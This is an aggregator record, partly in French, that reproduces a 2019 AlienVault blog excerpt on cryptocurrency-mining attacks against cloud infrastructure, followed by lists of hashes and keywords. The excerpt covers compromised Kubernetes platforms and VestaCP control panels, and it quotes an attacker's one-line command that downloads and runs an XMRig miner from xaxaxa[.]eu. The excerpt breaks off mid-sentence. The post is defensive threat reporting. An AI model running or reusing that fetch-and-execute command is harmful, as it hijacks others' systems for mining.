One Article Review
| Source |  AlienVault Blog |
|---|---|
| Identifiant | 1069807 |
| Date de publication | 2019-03-14 14:55:00 (vue: 2019-03-14 20:01:28) |
| Titre | Making it Rain - Cryptocurrency Mining Attacks in the Cloud |
| Texte | By Chris Doman and Tom Hegel Organizations of all sizes have made considerable shifts to using cloud-based infrastructure for their day-to-day business operations. However, cloud security hasn't always kept up with cloud adoption, and that leaves security gaps that hackers are more than happy to take advantage of. One of the most widely observed objectives of attacking an organization's cloud infrastructure has been for cryptocurrency mining. Despite recent falls in cryptocurrency prices, mining campaigns continue to plague organizations. Below, we've shared some of the more noteworthy forms of attack where the hackers’ end objective is to use your cloud infrastructure to mine cryptocurrency. Compromised Container Management Platforms We've seen attackers using open APIs and unauthenticated management interfaces to compromise container management platforms. We recently investigated attacks involving mining malware served from the domain xaxaxa[.]eu. That domain may sound familiar, as it appeared in a February 2018 report by RedLock on the compromise of the Kubernetes infrastructure of an electric car company. The report details the container commands showing the malicious request. RedLock reported the attackers used the compromised Kubernetes server in Amazon Web Services to mine Monero and potentially access customer data. In the event of such unrestricted access, cryptocurrency mining is one of the least malicious outcomes to victim organizations. For example, customer data and business operations could be at risk for theft or malicious modification. Following the attention of the report by RedLock, the owners of xaxaxa[.]eu published a Public Notice stating that they are just a mining proxy and are not responsible for any malicious activity themselves. Notably, we have also observed the domain serving pages saying it is a Dynamic Domain and a Vesta Control Panel. However, we have seen from other attacks listed in this article that the root domain is actively involved in serving malware and implicated in other campaigns. Control Panel Exploitation We have also observed attacks aimed at the control panels of web hosting solutions. The impact is similar to the previous topics, essentially allowing administrative control over web services for the execution of malicious code. In April 2018, the same attackers that compromised Kubernetes infrastructure started exploiting an unknown vulnerability in VestaCP. This was followed by frantic posts on the official VestaCP forums and those of web-hosts that run VestaCP. VestaCP users provided details on how their installations were compromised. In these attacks, they added a new backdoor user called “sysroot,” and then downloaded and installed the XMRig application to mine Monero cryptocurrency. pkill -f xmrig; wget -O /tmp/gcc http://xaxaxa[.]eu/gcc; chmod +x gcc; wget -O /tmp/config_1.json http://xaxaxa[.]eu/config_1.json; /tmp/gcc -c /tmp/config_1.json; Lastly, the |
| Envoyé | Oui |
| Condensat | 0d71406f8b4512e7ef1f066618b0b7fadb92acfea2786390d6c160b665551fae 12090d1a8045f21c848958a12de8ba00090ff4866096f27e5ee381631890d55c 1ee8281ecafd4f9a483a647f8f8de1171e5ea4fce47521891c0515608ac24d27 1fb48aa189d3632ff115e2d2ab6c5d686736976fff0496a018111203c70859ab 20b7ef6c5a0d6ff6f4e142c7bb3dcd0234e43ee3ffc49aa4fca944ee07725b33 34e5e80f0ca00ed9dc7bdb96b80c5acd326d1dd4650871cf96255cb3763576a4 36ce8ab58638f3dcba4af43616c37ad67ad52f73648fa854dfffe6c2734327fc 37b0b6ee5ca3166f569e73fcc6b5334dc97bdca3a0628c18fcfacdd1f7773c8f 3fcb36a932ddb1738ba5c519c956d61bf41aba1f1069f93fe93fc4b8fecc4dde 41b1e4e4e2034277cfc71f0d04941643b4bbd9f99e2fc426363f7e3af5f61f7f 43358bd6265d944ae4291e7b932c4386c7f7bdbdb391cfa88e272045bce067d4 4741f704ea90843f7ec764889387350e91a7045b359351de365ae08d567f05bd 5408sb 549f8b9260afeb8c409321c43efc36307d9435f93eab87d46232e42a594af552 56f4d2a44fbe4d9a35f5d52dfd00cee74dfb5087f3429b931b622758e6dce468 58d74311cf258fc78bc868bd7e4aa59df4dbbf9eb814d52ac58290c9e1ce91c9 5abfea87fb355ab6a564f74131d22315cfdddcf8314e856b6c5d191ee16924fe 64ae5cfab6b40d96564c7a5f5aa1ccc076e00c58f3f5cbe018fb079ede861efc 68993d434f653b51ff9730026553740810e036910597c77186d2d584f211f930 6a57b075d764095b893f95e0e6c067a719777086b17dda78bbcd0bcc1ae0bb47 6c81a68daa9cf8d9c050136822352c2116a01589966fbc5860c952dd025c01da 6ee970eade9c8b126a55327470b1c6190dc4c0843e2af924b1391c8531ee0dee 7270cd606364e2e6692a26fa1bd2ede1abae87a6e0fcd0d0bc3a3c8e06c88a1c 7c1bfd187b5b701b0f646b1ad3e32a174e9d37974c3170aaca594847977b204b 7c7721ba3133168df5abe8911d13416f9c49e20875d32d5ed0fba0a9107009c0 8ce8f86985f0178a81ce5165142e2557ab6526c79a8059eb458a8e162fdd1a84 9004c9514b386f3ec08391d4bff3e7194c91ff34ab0be1404c28b9a7dce1e279 92f18aaa1296fe5ef494cbc29c19801b4513281ee3d1d1740fea0228667a1c1b 98a652b8b1d9e2a7f30ad7b4493075facf0d05e5fb8478c2d8459259c29f69dd 9bf72a95caf40c2d0c9e20467bc10651a4217a1a77d80b3d109df67b5f5f9cc3 9e1d14bec32854954cdea48c90bfecb0bed6c6ce782891220a0e1de9534acfb3 9ecb17adb5dc93dc1be4543070f07d99a5814fcb59c0348e382b1a4f288d3680 a54efc8d7fd7831b1c7d0a5bdd1b070f79cc24a7c85480d667821fb325c3ab93 a6d11268d710f88424690fafc146fa2a203b272d06c7fa62d27c1e30d041e264 a9036cc7a118849120674a5f296753fcfb9cff833727373687233abea52f2328 ab69674c0ee7e32cea99df23f5d0dd28c12570c542e89c40fc4823e732a22fc5 access account acl activity added additional alarm amazon att&ck™ attacker attacks aws b58a24ae9b70cac7da68cd9d47f9ee5359846c7b68e256f3e6f0d6f3ebdd958d b9ae4462c7a5e6c418f890b9be0aef43a2579b9c88b66bfca005c2251f974984 bc3d6191665ee1fb8194f4141f9f4316fec7139412a698087ff1a3c740d8074a bd02e16a6c8af251d7fb3a392b492a2d7953f32bce3d82304950690a1b17de43 bid bigbatman bucket c065c06a9f9cd2d5e188360a0c931747d79720c7fcb470279cf19b4142fa442c c7c00ae277fcda556b0484bb1fb211f16196f675d966ad7bb886089f0e6bbe58 can ce4f740e7658c7c7c3633d77e608cfa5b8d3949e5a169fc92e9920c7e328d941 center cloud cloudtrail com compromise container credential crypto cryptocurrency d04e918b322a76d1fabae1d82452446bbbe1cc54d11aab728e7aab24f616ae35 d546ab0eb98f221383d07d82b65f62d3a94e4b09b9cb95050c076c60f6597aa6 d5fb3dec8ccfbbf665d4f03396c5965d35ce670c001448fae829af1452ee25ee d67e538bbf8893e959b043455f37dc7da0b1e2d06c17c8e2746dde3d77ab475f dc8dd8bece84345ea2831114fba34942e58c97208163ade2eb30b804f0f2577a deleted deleting detection detections docker e98ea24a2978e9a1c254ca88ac2de98101b93b365316833eea23e5f40d214efb ec2 environments events example exposing f36697d9cfc3db2dee3067b9bd7803a098bb597312c11081601835f2c03b1689 f4a561a1c2482cfa842635c098757937f08e4de86fb6674e34c8abc2af305398 failure fe8aa471b8e66e2ff078bf185d3eef37c76c9a2acd41d601223cda56d0a93b87 figure framework fun generates generic group iam indicators instance instances large loan login making malicious map mapped mine mining mitre modification new normally now number object often otx out progress pulse quickly rain role root security see specific spinning start steals suspicious terminated these trail view when will win wio2lo1n3 xaxaxa |
| Tags | Guideline |
| Stories | Uber Tesla |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.